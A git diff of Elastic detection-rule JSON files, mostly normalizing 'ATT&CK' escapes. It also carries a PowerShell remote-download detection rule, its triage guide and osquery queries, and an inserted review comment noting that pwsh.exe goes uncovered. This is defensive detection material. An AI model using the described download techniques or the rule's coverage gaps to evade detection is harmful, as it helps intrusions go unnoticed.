a/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_105.json b/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_105.json index b874c7e4214..9a9f02dc445 100644 --- a/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_105.json 
+++ b/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_105.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -77,7 +77,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_106.json b/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_106.json index 427a9993f09..95180248416 100644 --- a/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_106.json +++ b/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_106.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -74,7 +74,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_107.json b/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_107.json index 6c74a8f9630..2f3462e9b6c 100644 --- a/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_107.json +++ b/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_107.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
@@ -74,7 +74,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_208.json b/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_208.json index f7ec4439986..be05688c066 100644 --- a/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_208.json +++ b/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_208.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -74,7 +74,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_1.json b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_1.json index 07cbcd25709..662e96f75c5 100644 --- a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_1.json +++ b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_2.json b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_2.json index 4718e263183..78852080d8e 100644 --- a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_2.json 
+++ b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_2.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_3.json b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_3.json index e5e2de4d5dd..610036deda8 100644 --- a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_3.json +++ b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_3.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_4.json b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_4.json index ad10f37fe0b..67bdd21a3e0 100644 --- a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_4.json +++ b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_4.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_5.json b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_5.json index 916a313b789..5e57d8f16b8 100644 --- a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_5.json +++ b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_5.json 
@@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_104.json b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_104.json index 19a806c6b19..f6a3aa40546 100644 --- a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_104.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. 
Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. 
This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' 
SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan=30s\n [network where host.os.type == \"windows\" and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and network.protocol == \"dns\" and\n not dns.question.name : (\"localhost\", \"*.microsoft.com\", \"*.azureedge.net\", \"*.powershellgallery.com\", \"*.windowsupdate.com\", \"metadata.google.internal\") and\n not user.domain : \"NT AUTHORITY\"]\n [file where host.os.type == \"windows\" and process.name : \"powershell.exe\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\", \"ps1\", \"bat\") and\n not file.name : \"__PSScriptPolicy*.ps1\"]\n", "related_integrations": [ { @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -105,7 +105,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_105.json b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_105.json index 83863129568..a1d84a7675c 100644 --- a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_105.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan=30s\n [network where host.os.type == \"windows\" and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and network.protocol == \"dns\" and\n not dns.question.name : (\"localhost\", \"*.microsoft.com\", \"*.azureedge.net\", \"*.powershellgallery.com\", \"*.windowsupdate.com\", \"metadata.google.internal\") and\n not user.domain : \"NT AUTHORITY\"]\n [file where host.os.type == \"windows\" and process.name : \"powershell.exe\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\", \"ps1\", \"bat\") and\n not file.name : \"__PSScriptPolicy*.ps1\"]\n", "related_integrations": [ { @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -105,7 +105,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_106.json b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_106.json index 4b1877e1560..550d92955ac 100644 --- a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_106.json +++ b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_106.json 
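Review bot: In the `query` context that follows the changed `note`, the two sequence stages disagree on the process set: the DNS stage admits `process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe")` but the file-creation stage only `process.name : "powershell.exe"`, and since both stages are joined on `process.entity_id`, a download performed by pwsh.exe or powershell_ise.exe can satisfy the first stage but never the second, so those two binaries are effectively uncovered by this rule. The file stage should use the same tuple, `process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe")`. The investigation step "search for login events (for example, 4624) to the target host after the registry modification" also refers to a registry modification this rule does not detect and reads as carried over from another guide; "after the file download" would match what the rule actually fires on. This file is a versioned snapshot (`_105.json`) of a generated rule package and the hunk itself only normalizes JSON escapes without altering the parsed rule, so these corrections presumably belong in the upstream rule source as a new version rather than in this historical file.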
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - 